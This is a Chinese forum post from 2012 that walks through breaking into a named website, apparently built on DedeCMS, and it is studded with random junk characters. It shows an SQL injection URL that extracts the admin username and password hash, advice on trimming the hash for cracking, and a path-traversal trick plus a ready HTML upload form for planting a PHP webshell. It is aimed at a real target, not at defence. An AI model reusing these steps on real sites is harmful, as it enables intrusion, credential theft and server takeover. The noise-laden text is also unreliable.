①注入漏洞。0 d3 S3 r# e' A7 h+ N: Q! U
这站 http://www.political-security.com/- E2 U5 T4 ~6 v& B1 `" P
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
+ e2 ?3 N3 p1 Q" p0 _; ~www.political-security.com/data/mysql_error_trace.inc 爆后台+ T5 b( x; N6 m* |/ _
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。' N! _' b+ G# ~8 X( k
然后写上语句
) Z5 [9 q8 ^" M8 Y查看管理员帐号
2 F! a/ n! N) W' H' Y B. qhttp://www.political-security.co ... &membergroup=@`
" W+ `& I5 r* k- T
, n7 \" J' m1 ^& Q0 radmin ( T) _/ ?5 j- P' i
4 p% n# M, J3 t1 l) w/ p
查看管理员密码) g7 A4 X& i: w. _! k6 H8 C. {$ Z
http://www.political-security.co ... &membergroup=@`
3 p1 Q3 j. m2 f0 r9 Z$ k3 H" j5 U9 w3 B4 r2 _" p" U- N$ C
8d29b1ef9f8c5a5af429
0 w, I) X1 D/ L5 y# s& ^6 g; K0 [9 ^- Y+ G# y1 k. W
查看管理员密码/ a, u- _) @* m: i: `0 u) O
0 f3 |' F0 w0 a# ^$ O" Z9 C# ?得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
- w: Z2 ]! v4 d5 p' S! T' W: x! g9 x& ]5 d. U$ \
8d2* G& P- U, }) H9 ^" \8 b( ^2 j
9b1ef9f8c5a5af42
, X) Y: R |+ P1 Y& ?9) ^- L6 o0 p9 Y) C
* Q3 n! n6 r( F. C/ A* Kcmd5没解出来 只好测试第二个方法6 j+ ?. g$ X4 o. |$ H3 w% R. n
+ M& c+ ^, h+ g1 C
' W0 Y3 m8 ^$ Y% w: `( E/ b②上传漏洞:
& K, T. w. ~& ^& x s0 {& q- v" @; j1 ~+ s: D
只要登陆会员中心,然后访问页面链接
2 x/ q* }- H( T, g5 Z“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”# H2 f- _6 ?7 P: V9 d. h
+ V( a5 U/ B4 l* [/ S! T
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
$ i/ A7 ^1 z3 a/ U6 I8 r3 u, V3 V. y$ R" e
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
- c5 q. k. U+ V D! I& y! x7 a& a- X4 H4 f1 i& W, U
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>9 ~2 L# D" T j8 \: Z
或者
! I: R5 }" }% e! x. l# j即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对